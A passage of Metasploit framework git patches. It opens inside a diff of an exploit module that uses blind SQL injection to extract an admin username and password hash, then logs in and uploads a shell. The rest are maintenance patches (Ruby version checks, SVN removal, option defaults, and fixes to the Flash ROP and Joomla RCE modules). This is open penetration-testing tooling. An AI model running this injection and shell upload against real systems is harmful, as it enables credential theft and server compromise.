sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='" rand_key = Rex::Text.rand_text_alpha(1) res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"), + 'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "index_public.php"), 'vars_post' => { "search_friends_#{rand_key}" => sqli, 'rand_key' => rand_key, - 'search' => 'Search People' + 'search' => 'Search' }, - 'cookie' => cookie, - 'agent' => 'Mozilla' }) return res.body end - def dump_the_hash(cookie) + def dump_the_hash() extracted_hash = "" sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)" - login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli, cookie).to_i + login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli).to_i for i in 1..login_and_hash_length sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))" - asciival = generate_sql_and_test(false, false, sqli, cookie) + asciival = generate_sql_and_test(false, false, sqli) if asciival >= 0 extracted_hash << asciival.chr end @@ -236,13 +176,14 @@ class MetasploitModule < Msf::Exploit::Remote return extracted_hash.split(":") end - def get_ascii_value(sql, cookie) + # greetz to rsauron & the darkc0de crew! + def get_ascii_value(sql) lower = 0 upper = 126 while lower < upper mid = (lower + upper) / 2 sqli = "#{sql}>#{mid}" - result = perform_request(sqli, cookie) + result = perform_request(sqli) if result =~ /There are \d+ entries\./ lower = mid + 1 else @@ -253,7 +194,7 @@ class MetasploitModule < Msf::Exploit::Remote value = lower else sqli = "#{sql}=#{lower}" - result = perform_request(sqli, cookie) + result = perform_request(sqli) if result =~ /There are \d+ entries\./ value = lower end @@ -261,27 +202,27 @@ class MetasploitModule < Msf::Exploit::Remote return value end - def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie) + def generate_sql_and_test(do_true=false, do_test=false, sql=nil) if do_test if do_true - result = perform_request("1=1", cookie) + result = perform_request("1=1") if result =~ /There are \d+ entries\./ return true end else not do_true - result = perform_request("1=2", cookie) + result = perform_request("1=2") if not result =~ /There are \d+ entries\./ return true end end elsif not do_test and sql - return get_ascii_value(sql, cookie) + return get_ascii_value(sql) end end - def test_injection(cookie) - if generate_sql_and_test(do_true=true, do_test=true, sql=nil, cookie) - if generate_sql_and_test(do_true=false, do_test=true, sql=nil, cookie) + def test_injection() + if generate_sql_and_test(do_true=true, do_test=true, sql=nil) + if generate_sql_and_test(do_true=false, do_test=true, sql=nil) return true end end @@ -303,6 +244,8 @@ class MetasploitModule < Msf::Exploit::Remote private_data: opts[:password], origin_type: :service, private_type: :password, + private_type: :nonreplayable_hash, + jtr_format: 'sha512', username: opts[:user] }.merge(service_data) @@ -316,24 +259,14 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) - print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...") - report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD']) - - print_status("Dumping username and password hash...") - # we got admin hash now - credz = dump_the_hash(student_cookie) - print_good("Got the #{credz[0]} hash: #{credz[1]} !") + print_status("Dumping the username and password hash...") + credz = dump_the_hash() if credz - admin_cookie = login(credz[0], credz[1], true) - print_status("Logged in as #{credz[0]}, uploading shell...") - # install a plugin + print_good("Got the #{credz[0]}'s hash: #{credz[1]} !") + admin_cookie = login(credz[0], credz[1]) if upload_shell(admin_cookie) - print_good("Shell upload successful!") - # boom exec_code end end end end - From 257c8f4058942882f7d43577ff018213675a9b1f Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 15 Mar 2016 18:26:38 -0500 Subject: [PATCH 559/686] handle a sqlite table being empty --- .../post/meterpreter/extensions/android/android.rb | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 4315fb2f42..fa4d1e8372 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -307,14 +307,16 @@ class Android < Extension unless writeable result = { - columns: [], + columns: [], rows: [] } data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP) - columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS) - result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE) - data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row| - result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + unless data.nil? + columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS) + result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row| + result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + end end result end From 3b6a3374ae5df53a3ad041da8c559e246111ebee Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 15 Mar 2016 20:58:14 -0500 Subject: [PATCH 560/686] prefer explicit defaults to implicit --- lib/msf/ui/console/driver.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index fa7685c847..fd0a76be40 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -139,7 +139,7 @@ class Driver < Msf::Ui::Driver self.disable_output = false # Whether or not command passthru should be allowed - self.command_passthru = opts['AllowCommandPassthru'] + self.command_passthru = opts.fetch('AllowCommandPassthru', true) # Whether or not to confirm before exiting self.confirm_exit = opts['ConfirmExit'] From 63263773d1f9503626a0c03e50c0fa74d1684482 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 15 Mar 2016 21:55:25 -0500 Subject: [PATCH 561/686] simplify sanity checks for Ruby 1.x --- lib/msf/sanity.rb | 83 ++--------------------------------------------- 1 file changed, 3 insertions(+), 80 deletions(-) diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb index 0a5506fa03..c77c217ed2 100644 --- a/lib/msf/sanity.rb +++ b/lib/msf/sanity.rb @@ -3,36 +3,12 @@ # Provides some sanity checks against the ruby build and version # -# Check for the broken pack/unpack in OS X 10.4.x -if ([1].pack('n') == "\x01\x00") - $stderr.puts "*** This ruby build has a broken pack/unpack implementation! " - - if (RUBY_PLATFORM =~ /darwin/) - $stderr.puts " Apple shipped a broken version of ruby with the 10.4.x " - $stderr.puts " release. Please install ruby from source, or use one of " - $stderr.puts " the free package managers to obtain a working ruby build." - end - +# Check for ruby 1.x and throw a warning +if (RUBY_VERSION =~ /^1/) + $stderr.puts "*** Ruby 1.x is not supported, please upgrade to Ruby 2.1 or newer." exit(0) end -# Check for ruby 1.8.2 as the minimal supported version -if (RUBY_VERSION =~ /^1\.[0-7]\./ or RUBY_VERSION =~ /^1\.8\.[0-1]$/) - $stderr.puts "*** This version of ruby is not supported, please upgrade to 1.8.7+" - exit(0) -end - -# Check for ruby 1.9.0 and throw a big nasty warning -if (RUBY_VERSION =~ /^1\.9\.0/) - $stderr.puts "*** Ruby 1.9.0 is not supported, please upgrade to Ruby 1.9.3 or newer." - exit(0) -end - -# Check for ruby 1.9.1 and throw a warning -if (RUBY_VERSION =~ /^1\.9\.1/) - $stderr.puts "*** Ruby 1.9.1 is not supported, please upgrade to Ruby 1.9.3 or newer." -end - if(RUBY_PLATFORM == 'java') require 'socket' s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP) @@ -56,56 +32,3 @@ rescue ::LoadError $stderr.puts "*** The ruby-openssl library is not installed, many features will be disabled!" $stderr.puts "*** Examples: Meterpreter, SSL Sockets, SMB/NTLM Authentication, and more" end - - -# -# Check for the ugly 1.8.7 short-named constants bug -# - -class ConstBugTestA - Const = 'A' - def test - Const == 'A' - end -end - -ConstBugTestC = ConstBugTestA.dup - -class ConstBugTestB < ConstBugTestC - Const = 'B' -end - -def ruby_187_const_bug - bugged = false - - begin - ConstBugTestA.new.test() - ConstBugTestB.new.test() - rescue ::NameError - bugged = true - end - - bugged -end - -if(ruby_187_const_bug()) - $stderr.puts "" - $stderr.puts "***********************************************************************" - $stderr.puts "*** *" - $stderr.puts "*** This version of the Ruby interpreter contains a serious bug *" - $stderr.puts "*** related to short-named constants, we strongly recommend that you *" - $stderr.puts "*** switch to a fixed version. Unfortunately, some Linux distros have *" - $stderr.puts "*** backported the buggy patch into 1.8.6, so you may need to contact *" - $stderr.puts "*** your vendor and ask them to review the URL below. *" - $stderr.puts "*** *" - $stderr.puts "*** Alternatively, you can download, build, and install the latest *" - $stderr.puts "*** stable snapshot of Ruby from the following URL: *" - $stderr.puts "*** - http://www.ruby-lang.org/ *" - $stderr.puts "*** *" - $stderr.puts "*** For more information, please see the following URL: *" - $stderr.puts "*** - https://bugs.launchpad.net/bugs/282302 *" - $stderr.puts "*** *" - $stderr.puts "***********************************************************************" - $stderr.puts "" -end - From 5a72f2df165d06f65611b52611529b536cf5d33b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 15 Mar 2016 22:00:32 -0500 Subject: [PATCH 562/686] remove subversion support --- lib/msf/core/framework.rb | 8 -- lib/msf/core/modules/loader/directory.rb | 4 - lib/msf/ui/console/command_dispatcher/core.rb | 12 +- lib/msf/util.rb | 4 - lib/msf/util/svn.rb | 120 ------------------ 5 files changed, 2 insertions(+), 146 deletions(-) delete mode 100644 lib/msf/util/svn.rb diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb index c8fd5db9cb..b8e797c8ec 100644 --- a/lib/msf/core/framework.rb +++ b/lib/msf/core/framework.rb @@ -38,14 +38,6 @@ class Framework Revision = "$Revision$" - # Repository information - RepoRevision = ::Msf::Util::SVN.revision - RepoUpdated = ::Msf::Util::SVN.updated - RepoUpdatedDays = ::Msf::Util::SVN.days_since_update - RepoUpdatedDaysNote = ::Msf::Util::SVN.last_updated_friendly - RepoUpdatedDate = ::Msf::Util::SVN.last_updated_date - RepoRoot = ::Msf::Util::SVN.root - # EICAR canary EICARCorrupted = ::Msf::Util::EXE.is_eicar_corrupted? diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb index 46f182e4f6..f311e4b767 100644 --- a/lib/msf/core/modules/loader/directory.rb +++ b/lib/msf/core/modules/loader/directory.rb @@ -32,10 +32,6 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base def each_module_reference_name(path, opts={}) whitelist = opts[:whitelist] || [] ::Dir.foreach(path) do |entry| - if entry.downcase == '.svn' - next - end - full_entry_path = ::File.join(path, entry) type = entry.singularize diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 2c80579dee..4154aaadc6 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2837,16 +2837,8 @@ class Core # Returns the revision of the framework and console library # def cmd_version(*args) - svn_console_version = "$Revision: 15168 $" - svn_metasploit_version = Msf::Framework::Revision.match(/ (.+?) \$/)[1] rescue nil - if svn_metasploit_version - print_line("Framework: #{Msf::Framework::Version}.#{svn_metasploit_version}") - else - print_line("Framework: #{Msf::Framework::Version}") - end - print_line("Console : #{Msf::Framework::Version}.#{svn_console_version.match(/ (.+?) \$/)[1]}") - - return true + print_line("Framework: #{Msf::Framework::Version}") + print_line("Console : #{Msf::Framework::Version}") end def cmd_grep_help diff --git a/lib/msf/util.rb b/lib/msf/util.rb index 6ce2bdd01e..7439f57d30 100644 --- a/lib/msf/util.rb +++ b/lib/msf/util.rb @@ -21,7 +21,3 @@ end # Executable generation and encoding require 'msf/util/exe' - -# Parse SVN entries -require 'msf/util/svn' - diff --git a/lib/msf/util/svn.rb b/lib/msf/util/svn.rb deleted file mode 100644 index 8b5f10175a..0000000000 --- a/lib/msf/util/svn.rb +++ /dev/null @@ -1,120 +0,0 @@ -# -*- coding: binary -*- -### -# -# framework-util-svn -# -------------- -# -# The class provides methods for parsing the SVN information in the framework directory -# -### - -require 'date' - -module Msf -module Util -class SVN - - def self.load_root - info = {} - path = ::File.join(::File.dirname(__FILE__), "..", "..", "..", ".svn", "entries") - if !::File.exists?(path) - return info - end - contents = '' - File.open(path, "rb") do |fd| - contents = fd.read(::File.size(path)) - end - if contents.include? " 7) - "%red#{diff.to_i} days ago%clr" - else - "#{diff.to_i} days ago" - end - end - end - - def self.last_updated_date - @@info ||= load_root - svnt = @@info[:updated] - if(not svnt) - return - end - begin - Date.parse(@@info[:updated]) - rescue ArgumentError - end - end - -end -end -end - From c8ad1b6017ed464f63aa3e60fe5c09b8568363da Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 15 Mar 2016 22:08:04 -0500 Subject: [PATCH 563/686] use the framework version in nessus plugin --- plugins/nessus.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 59833f0411..3fe7e9080f 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -106,7 +106,7 @@ module Msf #Use Msf::Config.get_config_root as the location. File.open("#{xindex}", "w+") do |f| #need to add version line. - f.puts(Msf::Framework::RepoRevision) + f.puts(Msf::Framework::Version) framework.exploits.sort.each { |refname, mod| stuff = "" o = nil From 0edc7fb2c58120251deff0ee6221c7a79fcd0d69 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 15 Mar 2016 22:08:25 -0500 Subject: [PATCH 564/686] whitespace fixes --- plugins/nessus.rb | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 3fe7e9080f..7e31a2738c 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -512,7 +512,7 @@ module Msf when '-S', '--search' search_term = /#{args.shift}/nmi end - end + end if !nessus_verify_token return @@ -562,7 +562,7 @@ module Msf when '-S', '--search' search_term = /#{args.shift}/nmi end - end + end if !nessus_verify_token return end @@ -727,7 +727,7 @@ module Msf scan_id = arg, host_id = args.shift end - end + end if [scan_id, host_id].any?(&:nil?) print_status("Usage: ") @@ -818,7 +818,7 @@ module Msf else scan_id = arg end - end + end if [host,rid].any?(&:nil?) print_status("Usage: ") @@ -894,7 +894,7 @@ module Msf when '-S', '--search' search_term = /#{args.shift}/nmi end - end + end if !nessus_verify_token return @@ -1285,13 +1285,13 @@ module Msf else scan_id = arg if args[0].in?(valid_categories) - category = args.shift + category = args.shift else print_error("Invalid category. The available categories are info, hosts, vulnerabilities, and history") return end end - end + end if !nessus_verify_token return @@ -1435,7 +1435,7 @@ module Msf else family_id = arg end - end + end if family_id.nil? print_status("Usage: ") @@ -1471,11 +1471,11 @@ module Msf when '-S', '--search' search_term = /#{args.shift}/nmi end - end + end list = @n.list_families tbl = Rex::Ui::Text::Table.new( - 'SearchTerm' => search_term, + 'SearchTerm' => search_term, 'Columns' => [ 'Family ID', 'Family Name', @@ -1504,7 +1504,7 @@ module Msf else plugin_id = arg end - end + end if !nessus_verify_token return @@ -1554,7 +1554,7 @@ module Msf when '-S', '--search' search_term = /#{args.shift}/nmi end - end + end if !nessus_verify_token return @@ -1711,7 +1711,7 @@ module Msf when '-S', '--search' search_term = /#{args.shift}/nmi end - end + end if !nessus_verify_token return From 44e1fefa2ed0ea84722389dcb0abf04809f10e09 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 16 Mar 2016 06:44:02 -0500 Subject: [PATCH 565/686] when normalizing a string type, ensure we have a string first --- lib/msf/core/opt_raw.rb | 2 +- lib/msf/core/opt_regexp.rb | 2 +- lib/msf/core/opt_string.rb | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/opt_raw.rb b/lib/msf/core/opt_raw.rb index 7da13693d9..1ecc37f290 100644 --- a/lib/msf/core/opt_raw.rb +++ b/lib/msf/core/opt_raw.rb @@ -13,7 +13,7 @@ class OptRaw < OptBase end def normalize(value) - if (value =~ /^file:(.*)/) + if (value.to_s =~ /^file:(.*)/) path = $1 begin value = File.read(path) diff --git a/lib/msf/core/opt_regexp.rb b/lib/msf/core/opt_regexp.rb index d7056dd63b..bb743077db 100644 --- a/lib/msf/core/opt_regexp.rb +++ b/lib/msf/core/opt_regexp.rb @@ -29,7 +29,7 @@ class OptRegexp < OptBase def normalize(value) return nil if value.nil? - return Regexp.compile(value) + return Regexp.compile(value.to_s) end def display_value(value) diff --git a/lib/msf/core/opt_string.rb b/lib/msf/core/opt_string.rb index 88818cb036..8b7499a940 100644 --- a/lib/msf/core/opt_string.rb +++ b/lib/msf/core/opt_string.rb @@ -13,7 +13,7 @@ class OptString < OptBase end def normalize(value) - if (value =~ /^file:(.*)/) + if (value.to_s =~ /^file:(.*)/) path = $1 begin value = File.read(path) From f83cb4ee32d79588b66fff902d4f237473075273 Mon Sep 17 00:00:00 2001 From: Tim Date: Wed, 16 Mar 2016 13:07:41 +0000 Subject: [PATCH 566/686] fix set_wallpaper --- modules/post/multi/manage/set_wallpaper.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb index af967b3f6f..0008a53ab7 100644 --- a/modules/post/multi/manage/set_wallpaper.rb +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -73,6 +73,8 @@ class MetasploitModule < Msf::Post def os_set_wallpaper(file) if session.type =~ /meterpreter/ && session.sys.config.sysinfo['OS'] =~ /darwin/i platform = 'osx' + else + platform = session.platform end case platform when /osx/ From d70308f76ef003a51f1990384e8362e6d3e8dc40 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 16 Mar 2016 09:52:21 -0500 Subject: [PATCH 567/686] undo logic changes in adobe_flas_otf_font --- modules/exploits/windows/browser/adobe_flash_otf_font.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index cd1b73f847..e1f1d0072b 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote return p end - if !t['ASLR'] && datastore['ROP'] == 'SWF' && flash_version =~ /11,3,300,257/ + if t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/ print_status("Using Rop Chain For Flash: #{flash_version}") pivot = [ 0x10004171, # POP EDI # POP ESI # RETN (1e0d0000) @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot}) - elsif !t['ASLR'] && datastore['ROP'] == 'SWF' && flash_version =~ /11,3,300,265/ + elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/ print_status("Using Rop Chain For Flash: #{flash_version}") pivot = [ 0x10004171, # POP EDI # POP ESI # RETN (1e0d0000) @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot}) - elsif !t['ASLR'] && datastore['ROP'] == 'SWF' && flash_version =~ /11,3,300,268/ + elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/ print_status("Using Rop Chain For Flash: #{flash_version}") pivot = [ 0x10004171, # POP EDI # POP ESI # RETN (1e0d0000) From 1769bad762922a6a0983fd18fbe51af61d4646af Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 16 Mar 2016 09:53:09 -0500 Subject: [PATCH 568/686] fix FORCE logic --- modules/exploits/multi/http/joomla_http_header_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb index 9e2974d1db..508a61c99c 100644 --- a/modules/exploits/multi/http/joomla_http_header_rce.rb +++ b/modules/exploits/multi/http/joomla_http_header_rce.rb @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - if check == Exploit::CheckCode::Safe && datastore['FORCE'] + if check == Exploit::CheckCode::Safe && !datastore['FORCE'] print_error('Target seems safe, so we will not continue.') return end From 53f1338ad0f2cfaf461ca7c5580ebd8e267e2d89 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 16 Mar 2016 13:10:39 -0400 Subject: [PATCH 569/686] Update module to remove references to print peer --- .../auxiliary/scanner/misc/easycafe_server_fileaccess.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb index 64bfb18cfb..d287f6e5e0 100644 --- a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb +++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb @@ -46,12 +46,12 @@ class Metasploit4 < Msf::Auxiliary def get_file res = sock.get_once unless res - print_error("#{peer} - Unable to retrieve file due to a timeout.") + print_error("Unable to retrieve file due to a timeout.") return end unless res.length == 261 - print_error("#{peer} - Received a response of an invalid size.") + print_error("Received a response of an invalid size.") return end @@ -61,7 +61,7 @@ class Metasploit4 < Msf::Auxiliary contents << sock.get_once end - print_status("#{peer} - File retrieved successfully (#{contents.length} bytes)!") + print_status("File retrieved successfully (#{contents.length} bytes)!") contents end @@ -77,7 +77,7 @@ class Metasploit4 < Msf::Auxiliary packet << "\x00" * (255 - file_path.length) packet << "\x01\x00\x00\x00\x01" - vprint_status("#{peer} - Sending request (#{packet.length} bytes)") + vprint_status("Sending request (#{packet.length} bytes)") connect sock.put(packet) From 9ac4ec4bfc5add1b01dd5bfe945e75c0149ccf0f Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 16 Mar 2016 13:22:06 -0400 Subject: [PATCH 570/686] Update the class name to MetasploitModule --- modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb index d287f6e5e0..b16a4cfc06 100644 --- a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb +++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner From 631e24c02b0a85bcdb7efcc0c3e05b3a3cb00e14 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 16 Mar 2016 13:31:24 -0400 Subject: [PATCH 571/686] Update the msftidy warning for module class names --- tools/dev/msftidy.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index b4bb2d3b1c..eb294cd2f0 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -511,7 +511,7 @@ class Msftidy def check_bad_class_name if @source =~ /^\s*class (Metasploit\d+)\s* Date: Tue, 15 Mar 2016 17:52:48 -0500 Subject: [PATCH 572/686] Remove unused datastore option --- lib/msf/core/module_manager.rb | 4 ---- lib/msf/ui/console/command_dispatcher/core.rb | 1 - 2 files changed, 5 deletions(-) diff --git a/lib/msf/core/module_manager.rb b/lib/msf/core/module_manager.rb index e2e8b221ca..b33f6127f1 100644 --- a/lib/msf/core/module_manager.rb +++ b/lib/msf/core/module_manager.rb @@ -146,10 +146,6 @@ module Msf # @param klass [Class] The module class # @return [void] def auto_subscribe_module(klass) - # If auto-subscribe has been disabled - if framework.datastore['DisableAutoSubscribe'] - return - end # If auto-subscription is enabled (which it is by default), figure out # if it subscribes to any particular interfaces. diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index e11aa9397d..3d4fab729f 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2191,7 +2191,6 @@ class Core # @param str [String] the string currently being typed before tab was hit # @param words [Array] the previously completed words on the command line. words is always # at least 1 when tab completion has reached this stage since the command itself has been completed - def cmd_set_tabs(str, words) # A value has already been specified From c21bad78e807a9e3dfa97edfd8e4d8881b271e56 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 15 Mar 2016 18:35:32 -0500 Subject: [PATCH 573/686] Fix some more String defaults --- lib/msf/core/exploit/http/client.rb | 2 +- lib/msf/core/exploit/http/server.rb | 6 +++--- lib/msf/core/exploit/sunrpc.rb | 2 +- lib/msf/core/payload/ruby.rb | 2 +- modules/auxiliary/admin/mssql/mssql_findandsampledata.rb | 2 +- 5 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 4bf9ca91c4..b8152115bb 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -85,7 +85,7 @@ module Exploit::Remote::HttpClient # # Remaining evasions to implement # -# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', 'false']), +# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', false]), # OptInt.new('HTTP::junk_pipeline', [true, 'Insert the specified number of junk pipeline requests', 0]), ], self.class ) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 04a91c0263..7eb5370411 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -32,9 +32,9 @@ module Exploit::Remote::HttpServer register_evasion_options( [ - OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', 'false']), - OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', 'false']), - OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', 'false']), + OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]), + OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]), + OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]), OptEnum.new('HTTP::compression', [false, 'Enable compression of HTTP responses via content encoding', 'none', ['none','gzip','deflate']]), OptString.new('HTTP::server_name', [true, 'Configures the Server header of all outgoing replies', 'Apache']) ], Exploit::Remote::HttpServer diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb index 25dc07113a..265bea4ac5 100644 --- a/lib/msf/core/exploit/sunrpc.rb +++ b/lib/msf/core/exploit/sunrpc.rb @@ -31,7 +31,7 @@ module Exploit::Remote::SunRPC register_evasion_options( [ - OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', 'false']), + OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', false]), ], Msf::Exploit::Remote::SunRPC ) diff --git a/lib/msf/core/payload/ruby.rb b/lib/msf/core/payload/ruby.rb index 80ff558804..e884fa1aca 100644 --- a/lib/msf/core/payload/ruby.rb +++ b/lib/msf/core/payload/ruby.rb @@ -10,7 +10,7 @@ module Msf::Payload::Ruby [ # Since space restrictions aren't really a problem, default this to # true. - Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ]) + Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", true ]) ] ) end diff --git a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb index 976ce09e8b..55f48177df 100644 --- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb +++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('KEYWORDS', [ true, 'Keywords to search for','passw|credit|card']), - OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', '1']), + OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', 1]), ], self.class) end From af642379e6f2cf156edb7389253c64694c14a681 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 16 Mar 2016 09:46:10 -0500 Subject: [PATCH 574/686] Fix some OptInts --- modules/auxiliary/scanner/rdp/ms12_020_check.rb | 2 +- modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb | 2 +- modules/exploits/windows/local/s4u_persistence.rb | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index f9174649d9..ee463ca505 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]) + OptInt.new('RPORT', [ true, 'Remote port running RDP', 3389 ]) ], self.class) end diff --git a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb 